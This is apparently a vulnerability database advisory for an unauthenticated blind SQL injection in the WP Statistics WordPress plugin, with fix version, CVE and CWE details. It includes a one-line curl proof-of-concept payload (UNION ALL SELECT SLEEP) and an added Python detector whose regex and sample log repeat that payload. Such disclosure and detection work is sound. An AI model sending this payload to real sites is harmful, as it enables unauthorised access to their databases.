WP Statistics <= 12.6.6.1 - Unauthenticated Blind SQL Injection
Description
The plugin's REST API endpoint (/wp-json/wpstatistics/v1/hit), which is only exposed when the 'use cache plugin' setting is enabled (disabled by default), is vulnerable to unauthenticated, time-based blind SQL injection through the wp_statistics_hit[search_query] parameter.
Proof of Concept
time curl -X POST 'http://host/wp-json/wpstatistics/v1/hit' --data "wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x\' UNION ALL SELECT SLEEP(5)-- x"
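Added example, not part of the advisory or of the WP Statistics plugin: a small detector that flags POST requests to the hit endpoint whose wp_statistics_hit[] fields carry the injection indicators seen in the PoC (quote break-out, UNION SELECT, SLEEP(), trailing comment), run over constructed request-body log records. The JSON-lines log format, its field names and the IP addresses are assumptions; a reverse proxy or WAF with body logging would be the real source.

```python
import json
import re
from typing import Dict, List
from urllib.parse import parse_qs

HIT_ENDPOINT = "/wp-json/wpstatistics/v1/hit"

# Indicator patterns shaped after the PoC payload; case-insensitive because MySQL keywords are.
SQLI_INDICATORS = re.compile(
    r"(\\?['\"]\s*(union|or|and)\b|\bunion\b\s+(all\s+)?select\b|\bsleep\s*\(|--\s)",
    re.IGNORECASE,
)

def suspicious_fields(body: str) -> List[str]:
    """Return the wp_statistics_hit[...] field names whose value matches an indicator."""
    # parse_qs keeps PHP-style bracketed keys as literal key names, which is what we match on.
    params = parse_qs(body, keep_blank_values=True)
    hits = []
    for key, values in params.items():
        if not key.startswith("wp_statistics_hit"):
            continue
        if any(SQLI_INDICATORS.search(v) for v in values):
            hits.append(key)
    return hits

def scan_log(lines: List[str]) -> List[Dict]:
    """One finding per POST to the hit endpoint with a suspicious field; rt (response time)
    is kept because a delay near the SLEEP() argument corroborates time-based injection."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or rec.get("path") != HIT_ENDPOINT:
            continue
        fields = suspicious_fields(rec.get("body", ""))
        if fields:
            findings.append({"src": rec.get("src"), "fields": fields, "rt": rec.get("rt")})
    return findings

# Constructed sample records (assumed log format): a benign hit, one mirroring the PoC body, and unrelated traffic.
SAMPLE_LOG = [
    json.dumps({"src": "198.51.100.7", "method": "POST", "path": HIT_ENDPOINT, "rt": 0.08,
                "body": "wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=/blog/&wp_statistics_hit[search_query]=wordpress"}),
    json.dumps({"src": "203.0.113.9", "method": "POST", "path": HIT_ENDPOINT, "rt": 5.04,
                "body": "wp_statistics_hit=x&wp_statistics_hit[track_all]=1&wp_statistics_hit[page_uri]=x&wp_statistics_hit[search_query]=x\\' UNION ALL SELECT SLEEP(5)-- x"}),
    json.dumps({"src": "203.0.113.9", "method": "GET", "path": "/wp-json/wp/v2/posts", "body": ""}),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit on this rule is a reason to confirm the plugin version is at least 12.6.7; per the description above, the endpoint is only reachable while the 'use cache plugin' setting is enabled.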

Affects Plugin

Fixed in version 12.6.7

References

CVE 2019-13275
URL https://github.com/wp-statistics/wp-statistics/commit/bd46721b97794a1b1520e24ff5023b6da738dd75

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Thomas Chauchefoin
Views 2592
Verified No
WPVDB ID 9412

Timeline

Publicly Published 2019-07-01 (23 days ago)
Added 2019-07-01 (22 days ago)
Last Updated 2019-07-09 (14 days ago)
